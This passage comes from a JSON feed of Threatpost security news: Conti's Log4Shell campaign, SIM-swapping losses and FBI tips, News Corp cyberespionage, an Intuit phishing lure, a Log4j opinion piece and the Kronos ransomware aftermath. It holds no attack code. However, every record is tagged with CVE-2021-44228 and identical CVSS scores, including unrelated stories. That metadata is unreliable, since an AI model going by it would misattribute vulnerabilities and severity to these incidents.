TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. 
Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T22:37:59", "description": "SIM-swapping \u2013 the practice of duping mobile carriers into switching a target\u2019s phone services to an attacker-controlled phone \u2013 is on the rise, the Feds are warning \u2013 leading to millions in losses for consumers who found their bank accounts drained and other accounts taken over.\n\nSubscriber Identity Modules (SIMs) are small chips inside mobile phones that allow the carrier to identify and register subscriber devices \u2013 a requirement to provide service to them. Most SIM-swapping attacks take the form of social engineering, where the criminals impersonate victims and convince customer-service agents to change over victims\u2019 services to new phones that they control.\n\nOnce the service has been redirected, the crooks have access to any of the victims\u2019 calls, texts, voicemails and saved profile data, which allows them to send \u201cForgot Password\u201d or \u201cAccount Recovery\u201d requests to the victim\u2019s email, which enables them to easily defeat two-factor authentication that uses one-time passcodes and thus to crack high-value accounts.\n\nWhile SIM-swapping (aka SIM-jacking) isn\u2019t a new practice, the attacks now seem to be accelerating at a rapid clip: Last year, the FBI Internet Crime Complaint Center (IC3) received 1,611 SIM swapping complaints with adjusted losses stemming from resulting account takeovers and data theft totaling more than $68 million, [it said this week](<https://www.ic3.gov/Media/Y2022/PSA220208>). 
In contrast, for the entire three-year period between January 2018 to December 2020, there were just 320 SIM-swapping complaints, with adjusted losses of approximately $12 million.\n\n## **SIM-Swapping: All Too Easy**\n\nIt\u2019s usually not a difficult plan to execute successfully, given that many carriers [don\u2019t ask in-depth security questions](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>) that fully verify that the caller is in fact the legitimate cell phone user. Often, the challenge questions can be answered with previously phished information or even with public information found on social-media sites.\n\nThe epidemic of large-scale data breaches also contributes to the gambit\u2019s high rate of success, according to Chris Clements, vice president of solutions architecture at Cerberus Sentinel.\n\n\u201cWhen people wonder what the consequences of large-scale data breaches are, this is exactly it,\u201d he noted via email. \u201cBoth people and companies have become conditioned to being able to verify identity through simple questions like Social Security number or mother\u2019s maiden name. Unfortunately, this falls apart completely when data breaches affecting millions of people routinely occur.\u201d\n\nOther attack vectors include phishing and insider-threat avenues. 
For instance, when it came to light in 2019 that Twitter CEO Jack Dorsey was the victim of a SIM swap, the New York Times [reported](<https://www.nytimes.com/2019/09/05/technology/sim-swap-jack-dorsey-hack.html>) that \u201chacking crews have paid off phone company employees to do\u2026switches for them, often for as little as $100 for each phone number.\u201d Again, this type of accomplice-cultivation isn\u2019t unusual \u2013 it [even resulted in a lawsuit](<https://threatpost.com/att-faces-224m-legal-challenge-over-sim-jacking-rings/136645/>) for AT&T in 2018.\n\nSIM-swapping is not just happening in the United States, either: The Spanish National Police, for instance, this week [busted open](<https://www.policia.es/_es/comunicacion_prensa_detalle.php?ID=11102>) a SIM-swapping ring that got around carriers\u2019 photo-based account verification by using non-original photos of victims to request swaps.\n\n## **Protection Responsibility Lies with Carriers**\n\nThere\u2019s very little that end users can do to avoid becoming victims of SIM-jacking jerks (although the FBI recommends a few protection steps, below). Primarily, it\u2019s the mobile phone company\u2019s responsibility to keep its house in order, researchers said.\n\n\u201cAll organizations, but especially service providers must move from more simplistic means of validating identity to more sophisticated ones,\u201d Cerberus\u2019 Clements said. \u201cPIN codes unique to each user\u2019s account can be one way of adding additional security to the process. \u2018Out of wallet\u2019 questions are another alternative that works by verifying much harder to compromise information such as last three home addresses or cars. 
It may be more of a hassle for everyone, but it\u2019s simply no longer viable to rely on information that has been routinely compromised to validate a person\u2019s identity.\u201d\n\nAnother best practice that all businesses can implement is to move on from SMS-based 2FA, others said.\n\n\u201cSIM-swapping attacks have been going on for over a decade and have likely resulted in billions in stolen cryptocurrency and other financial crime,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, said via email. \u201cSMS-based MFA has to be the most popular MFA option used on the internet, and most of the time, people do not have a choice of whether to use it or not. Their bank, vendor or service says they have to use it. And, let me say again, the U.S. government has said not to use it since 2017. The better question to ask is why so many services and vendors are still using SMS-based and phone-number based MFA five years after the U.S. government said not to use it? Why are we so slow and broken?\u201d\n\nThe FBI recommended this week that mobile carriers take the following precautions:\n\n * Educate employees and conduct training sessions on SIM swapping.\n * Carefully inspect incoming email addresses containing official correspondence for slight changes that can make fraudulent addresses appear legitimate and resemble actual clients\u2019 names.\n * Set strict security protocols enabling employees to effectively verify customer credentials before changing their numbers to a new device.\n * Authenticate calls from third-party authorized retailers requesting customer information.\n\n## **SIM-Swapping Consumer Protection Tips**\n\nThe FBI also recommended this week that individuals take the following precautions:\n\n * Do not advertise information about financial assets, including ownership or investment of cryptocurrency, on social-media websites and forums.\n * Do not provide your mobile number account information over the phone to representatives that 
request your account password or PIN. Verify the call by dialing the customer service line of your mobile carrier.\n * Avoid posting personal information online, such as mobile phone number, address or other personal identifying information.\n * Use a variation of unique passwords to access online accounts.\n * Be aware of any changes in SMS-based connectivity.\n * Use strong MFA methods such as biometrics, physical security tokens or standalone authentication applications to access online accounts.\n * Do not store passwords, usernames or other information for easy login on mobile device applications.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T22:13:33", "type": "threatpost", "title": "Sharp SIM-Swapping Spike Causes $68M in Losses", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-10T22:13:33", "id": 
"THREATPOST:795C39123EE147B39072C9434899E8FE", "href": "https://threatpost.com/sharp-sim-swapping-spike-losses/178358/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "The Chinese hackers responsible for an attack on media giant News Corp last month likely were seeking intelligence to serve China\u2019s interests in a cyberespionage incident that shows the persistent vulnerability of corporate networks to email-based attacks, security professionals said.\n\n[Reports](<https://www.theguardian.com/media/2022/feb/04/new-corp-hack-murdoch-media-firm-believes-hackers-links-china>) on Monday revealed that a Jan. 20 incident at Rupert Murdoch\u2019s media giant involved an attack on journalists\u2019 email accounts that gave the intruders access to sensitive data. The breach \u2013 limited to several individuals working for outlets including News UK, the Wall Street Journal and the New York Post \u2013 has raised concerns over the safety of confidential sources working with journalists affected by the incident.\n\nIn an email to staff, News Corp cited a \u201cforeign government\u201d as responsible for the \u201cpersistent nation-state attack\u201d and confirmed that \u201csome data\u201d was stolen, according to published reports. 
The media giant enlisted the help of cybersecurity firm [Mandiant](<https://www.mandiant.com/>) to investigate the incident, which the firm said is likely the work of a China-sponsored actor.\n\n\u201cMandiant assesses that those behind this activity have a China nexus, and we believe they are likely involved in espionage activities to collect intelligence to benefit China\u2019s interests,\u201d said David Wong, vice president of consulting at Mandiant, in an emailed statement to Threatpost.\n\n## **Targeting Journalists for Cyberespionage**\n\nIndeed, while China typically targets \u201cmilitary and intellectual property\u201d in its state-sponsored attacks, journalists also are \u201cfairly high on their radar for espionage\u201d due to their work with sources \u2013 confidential and otherwise, as noted by one cybersecurity professional.\n\n\u201cJournalists can have access to sources and intelligence about adversaries and other opponents of the Chinese regime, both foreign and domestic, or can be researching stories that could generate negative publicity for the Chinese government,\u201d Mike McLellan, director of intelligence for cyber threat intelligence firm [Secureworks Counter Threat Unit](<https://www.secureworks.com/about/counter-threat-unit>), wrote in an email to Threatpost on Monday.\n\nPaul Farrington, chief product officer for security firm [Glasswall](<https://glasswallsolutions.com/>), agreed that it\u2019s \u201ccommon for politically motivated cybercriminals to mine reporters\u2019 materials for intelligence,\u201d given their frequent conversations with confidential sources that have access to information about current and future geopolitical events.\n\nMoreover, China has previously shown an interest in attacking journalists, making this latest attack \u201centirely consistent with past Chinese state-sponsored behavior,\u201d concurred Dave Merkel, CEO of cybersecurity firm [Expel](<http://www.expel.io/>).\n\nHe cited [a previous 
attack](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/77477/>) on the New York Times by China in 2013 as a precedent for the nation\u2019s targeting of journalists. Moreover, the threat actors\u2019 use of business email compromise (BEC) to pull off the attack \u201cmakes sense\u201d and also is consistent with nation-state actors, Merkel observed.\n\n\u201cWhen it comes to cyberattacks, nation state actors will only be as advanced as they have to \u2013 why burn expensive zero days if you don\u2019t need to?\u201d he said.\n\n## **Preventing BEC Attacks**\n\nIn fact, Merkel said the No. 1 source of attacks against Expel customers is BEC. \u201cThere\u2019s no reason to think Chinese state-sponsored groups wouldn\u2019t use the same tactics against their targets if those tactics work \u2013 and news organizations are definitely targets,\u201d he said.\n\nIndeed, BEC is a major threat that typically involves human error. The way it works is that an employee at a company receives an email with a malicious link or document and takes an action that can install malware on their computers. This can result in consequences from local data theft to giving threat actors access to the corporate network to advanced attack vectors such as ransomware.\n\nMicrosoft unveiled a timely yet unrelated step this week that could help mitigate the impact of, or even prevent, future BEC attacks: Namely, the company will soon begin blocking, by default, VBA macros obtained from the internet in five Office apps, as the company [revealed in a blog post](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) Monday.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft Principal Program Manager Kellie Eickmeyer wrote. 
\u201cA message bar will appear for users notifying them with a button to learn more.\u201d\n\nThis default setting \u201cis more secure and is expected to keep more users safe including home users and information workers in managed organizations,\u201d she added. Indeed, sending documents loaded with macros that immediately install malware on people\u2019s computers with one click is a popular tactic of email-based attacks.\n\nThe new default setting will apply to Microsoft Office on devices running Windows for Access, Excel, PowerPoint, Visio and Word. Microsoft will roll out the change first in a preview version of Office 2023, starting with its Current Channel update channel in early April 2022.\n\nLater, the change will be available in the other update channels, such as Current Channel, Monthly Enterprise Channel, and Semi-Annual Enterprise Channel. In the future Microsoft also will change the Office default setting for VBA macros in Office LTSC, Office 2021, Office 2019, Office 2016 and Office 2013, Eickmeyer added.\n\nThis move may make it more difficult to slip malware past corporate employees using BEC tactics. 
However, as one security professional noted, companies still must remain vigilant and take an \u201call hands on deck\u201d approach to both threat mitigation and response, given the evolving nature and increased occurrence of cyber-attacks that organizations face.\n\n\u201cAs the threat environment continues to change, proper and continuous diligence is required to ensure all cyber defensive tools and techniques are employed to protect your most precious data assets,\u201d observed Tom Garrubba, vice president at risk-management firm [Shared Assessments](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUY-2Flf1YfJi8Jl6Pa8fYnwMooXA0t7nRcGwuHZmhL1VNFMgZ7_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2Ec5EmRJ9V9NBrK7aLIAhF6196NdmcyMkxC1VH7FuP-2B9MgrfUoUGWizcYBWkO7YHK-2FSUvJvNf4hmd993Dye56pyq89HFwWZoHTuzoXanpznaaoSlcLfzlPiOUFNRXQsUtdLW6-2BFIvjy5oI3kpt8fOysQ-2BJJ7pNAMDmmGf2nc2TWwK5J4rfFBha96XAcFn5Tdh8idS0UjuT6a1Fel8Ug5x5WkloyV8fxoFRJXaTFLqD0L0IDktPIPckEiewFCmD6TiVprT0ERdmp5-2BqTF3UZ3I98-3D>)**, **in an email to Threatpost. 
\u201cContinuous intelligence, monitoring, and dialogue with critical partners and suppliers should be ongoing to ensure \u2018all is ready\u2019 in the event recovery is needed, and that additional support is available in the event something were to occur.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-08T14:14:59", "type": "threatpost", "title": "China Suspected of News Corp Cyberespionage Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-08T14:14:59", "id": "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "href": "https://threatpost.com/china-suspected-news-corp-cyberespionage/178277/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Just in time for tax season, Intuit is warning customers of a phishing campaign that threatens to close user 
accounts if they don\u2019t click on a malicious link.\n\nThe attacks on the accounting-software specialist that many people use for filing U.S. income tax forms come as phishers overall are ramping up more creative and stealthy ways to trick users into installing malware or giving up personal data.\n\nIntuit posted a screenshot from a suspicious email customers reported receiving, which the company insists \u201cdid not come from Intuit,\u201d according to [a media statement](<https://security.intuit.com/security-notices>) posted Thursday.\n\nThe faux email, purporting to come from the Intuit Maintenance Team, informs the recipient that his or her account has been \u201ctemporarily disabled\u201d \u201cdue to inactivity\u201d and that it\u2019s \u201ccompulsory\u201d to restore access to the account within 24 hours.\n\n\u201cThis is a result of recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season,\u201d according to the email.\n\nThe email directs users to a link, https://proconnect[dot]intuit.com/Pro/Update, claiming it will immediately restore access to their accounts.\n\n## **Intuit: Resist the Bait**\n\nThough Intuit does not provide information on what happens if users click on the link, the company is warning customers that it is likely malicious and not to click on it nor on any attachment that is associated with the email.\n\nIf a customer already has followed the email\u2019s instructions and clicked on the link, Intuit recommends that users delete any resulting downloads immediately; scan their system using an up-to-date antivirus program; and change their passwords.\n\nOne security professional said he was not surprised to learn of such an engineered attack on Intuit and expects that more will come as we get deeper into tax season.\n\n\u201cThis is not an unusual way for cybercriminals to use to trick people into logging into their accounts on a fake website, allowing them to 
steal the user\u2019s credentials,\u201d observed Erich Kron, security awareness advocate at security awareness and training firm KnowBe4. \u201cThese kind of attacks are certain to ramp up during tax season, as we are seeing now.\u201d\n\n## **Phishing Attacks Get Smarter**\n\nIndeed, phishers have been escalating attacks with vigor lately, using more creative ways to both trick users into taking the bait as well as to hide their activity. Researchers have reported a flurry of phishing attacks using new tricks and tactics since the end of last year.\n\nJust this week alone, security researchers have discovered two novel ways phishers are targeting victims. In one, Proofpoint researchers observed adversaries procuring and then using phishing kits that are focused on [bypassing multi-factor authentication (MFA)](<https://threatpost.com/low-detection-phishing-kits-bypass-mfa/178208/>) methods, by stealing authentication tokens via man-in-the-middle (MiTM) attacks.\n\nThe other phishing campaign revealed this week described attackers [using an under-the-radar PowerPoint file](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) to hide malicious executables that can rewrite Windows registry settings \u2014 with the goal of ultimately taking over an end user\u2019s computer.\n\nOther recent phishing attacks aimed at stealing credentials found scammers using [a legitimate Google Drive collaboration feature](<https://threatpost.com/scammers-google-drive-malicious-links/160832/>) and leveraging [the \u201cComments\u201d feature of Google Docs](<https://threatpost.com/attackers-exploit-flaw-google-docs-comments/177412/>), respectively, to trick users into clicking on malicious links.\n\nWhile phishing has been around almost as long as people have been sending emails, it\u2019s a threat vector that will never get old, noted one security professional.\n\n\u201cPhishing continues to be a popular means of attack because it continues to work,\u201d Tim Erlin, 
vice president of strategy at cybersecurity firm Tripwire, wrote in an email to Threatpost. \u201cIt only takes one user to click in order for the phishing campaign to be effective for the attacker.\u201d\n\nIt also remains dangerous because credential-stealing from victims is often a gateway attack that provides cybercriminals a way to engage in further and more disruptive attacks, such as defrauding people of money in financial accounts or ransomware attacks on corporate networks.\n\nMoreover, it remains difficult for an organization to prevent phishing attacks from success because they merely require human error rather than any compromise of infrastructure that the organization controls, Erlin added.\n\n\u201cWhile we try to address phishing with technological solutions, the problem remains a primarily human one,\u201d he said.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-04T13:28:01", "type": "threatpost", "title": "Attackers Target Intuit Users by Threatening to Cancel Tax Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-04T13:28:01", "id": "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "href": "https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T13:31:38", "description": "It\u2019s not my intention to be alarmist about the Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)), known as Log4Shell, but this one is pretty bad. \n\nFirst of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the [most serious vulnerability](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>) she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberattackers are already exploiting the vulnerability hundreds of times _every minute_. The fact is, Log4Shell is relatively easy to exploit, so even low-skilled hackers can take advantage.\n\nOK, maybe it is time for alarm.\n\nLog4j is open-source software from the Apache Software Foundation. [As explained by The Conversation](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>), this logging library is widely used to record events such as routine system operations and errors, and to communicate diagnostic messages regarding those events. A feature in Log4j allows users of the software to specify custom code for formatting a log message. 
This feature also allows third-party servers to submit software code that can perform all kinds of actions \u2013 including malicious ones \u2013 on the targeted computer. The result of an exploit for the bug is that an attacker can control a targeted server remotely.\n\n## **Attackers Took Early Advantage**\n\nWithin weeks of discovery of the flaw in mid-December, it was already reported that nation-state actors linked to North Korea, China, Iran and other countries had created toolkits for mass-exploiting this vulnerability quickly. Log4Shell also became a darling of the ransomware and botnet gangs operating around the globe. A real danger in this flaw is that there are so many ways to exploit it for malicious purposes.\n\nHow prevalent is Log4j in business systems? [Analysis by Wiz and Ernst & Young](<https://blog.wiz.io/10-days-later-enterprises-halfway-through-patching-log4shell/>) of more than 200 enterprise cloud environments with thousands of cloud accounts showed that 93 percent of those environments are at risk from the vulnerability. \n\n[Google researchers discovered](<https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j>) that more than 8 percent of all packages on Maven Central, a large Java package repository, have at least one version that is impacted by this vulnerability\u2014an \u201cenormous\u201d amount by all standards of ecosystem impact. \n\nSo, yeah, that\u2019s pretty extensive presence of this vulnerability. As for the global impact, it\u2019s still too early to tell. Much will depend on how well organizations respond to the threat.\n\n## **Everyone Must Take Action**\n\nFor everyone affected by this, there is both a business and moral imperative to take immediate steps to mitigate the vulnerability if it exists within public-facing systems. Naturally, no business wants its systems to be vulnerable to an attack that can lead to the corruption or theft of data and the potential for severe business disruption. 
\n\nAs for the moral imperative, the Federal Trade Commission points out that [companies have a responsibility to take steps \u201cto reduce the likelihood of harm to consumers.\u201d](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) With the fallout from the Equifax breach still fresh in memory, the FTC warns that it \u201cintends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\u201d Not every company serves consumers, of course, but that shouldn\u2019t matter with regard to addressing this issue.\n\nCISA issued a list of [\u201cimmediate actions\u201d](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) that organizations must undertake to remediate the risks posed by Log4Shell. The top action is to understand the extent of the problem by identifying which of your assets use the Log4j software and then apply an appropriate patch. Stop the bleed, so to speak. \n\nAfter that, you must assume you have already been compromised, hunt for signs of malicious activity within your systems, and continue to monitor for odd traffic patterns or behavior that could be indicative of an ongoing attack. \n\nIt\u2019s essential to detect the threat activity as the vulnerability is exploited or as attackers successfully insert themselves into your environment. This is where the efficacy of your security tools is put to the test.\n\n## **How Effective Are Your Security Tools?**\n\nSecurity tools that are dependent on traditional rule-based detection and pattern matching may have easily caught some of the commands being executed by injected malware in the early days of this exploit. 
However, as variants of Log4Shell hit the wild with better execution tactics, traditional security information and event management (SIEM) and extended detection and response (XDR) tools may struggle to identify attacks unless tool vendors make very frequent updates to the rule base. And that just isn\u2019t practical. Taking a layered security approach that includes some advanced detection methods such as machine learning, artificial intelligence and behavior analytics will also be crucial.\n\nEvery organization should have a mitigation plan in case something like this comes up again in the future. Whether it be to shut down the offending piece of software, or immediately patch it and test the patch before it goes back into production, teams need to be prepared for a proactive response within hours or even minutes. \n\nLog4Shell is a wake-up call for everyone. We shouldn\u2019t hit the snooze button until the next vulnerability comes around.\n\n_**Saryu Nayyar is CEO at [Gurucul](<https://gurucul.com/>).**_\n\n_**Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>).**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:21:04", "type": "threatpost", "title": "The Log4j Vulnerability Puts Pressure on the Security World", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T20:21:04", "id": "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "href": "https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Remember when Kronos, the workforce-management workhorse, got [whacked](<https://threatpost.com/kronos-ransomware-outage-payroll-chaos/176984/>) by ransomware in December, right in time to gum up end-of-year HR busywork such as bonuses and vacation tracking?\n\nCould take days to crawl back, Ultimate Kronos Group (UKG) [said](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) at the 
time. Or, then again, could take up to several weeks, it said in a subsequent [update](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>).\n\nIt turns out that dragging its Kronos Private Cloud (KPC) systems back has taken nearly two months. As of Jan. 22, it wasn\u2019t yet done dragging them back, but aggrieved customers had started the process of dragging the company into court as scheduling and payroll was disrupted at [thousands of employers](<https://www.shrm.org/resourcesandtools/hr-topics/technology/pages/ukg-ransomware-disrupts-scheduling-payroll-kronos-private-cloud.aspx>) \u2013 [including hospitals](<https://www.npr.org/2022/01/15/1072846933/kronos-hack-lawsuits>) \u2013 many of which have been forced to log hours manually.\n\nAs NPR reported on Jan. 15, some 8 million people experienced \u201cadministrative chaos\u201d following the attack, including tens of thousands of public transit workers in the New York City metro area, public service workers in Cleveland, employees of FedEx and Whole Foods, and \u201cmedical workers across the country who were already dealing with an omicron surge that has filled hospitals and exacerbated worker shortages.\u201d\n\n020722 18:31 UPDATE: Sportswear manufacturer Puma was one of two UKG customers whose employees\u2019 personally identifying information (PII) \u2013 including their Social Security Numbers (SSNs) \u2013 was stolen by attackers. See below for more details.\n\n020822 10:55 UPDATE: A UKG spokesperson reached out to Threatpost to clarify that the September Puma breach, which resulted in stolen source code, was unrelated to UKG\u2019s December ransomware attack on Kronos Private Cloud. UKG subsequently discovered that Puma was one of two customers who had employee PII compromised as a result of the ransomware attack. 
Puma was a Kronos Private Cloud customer, and the affected employees and their dependents are in the process of being notified, he said.\n\n## Furious and Filing Suits\n\nAs far as UKG\u2019s gratitude for customers\u2019 patience goes, it might be a little aspirational.\n\nCustomers were already seething over the company\u2019s lack of communication as the weekend unwound following the Saturday, Dec. 11 discovery of the attack. They [complained](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>) [about](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) poor communication, a lack of information about whether their data was still out there somewhere, that the company\u2019s portal and support site had gone AWOL right in the thick of things, and that the \u201cweeks\u201d or \u201cdelays\u201d to restore systems was insupportable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03172618/Kronos-customers-fuming-e1643927213846.jpg>)\n\nKronos customers\u2019 complaints. 
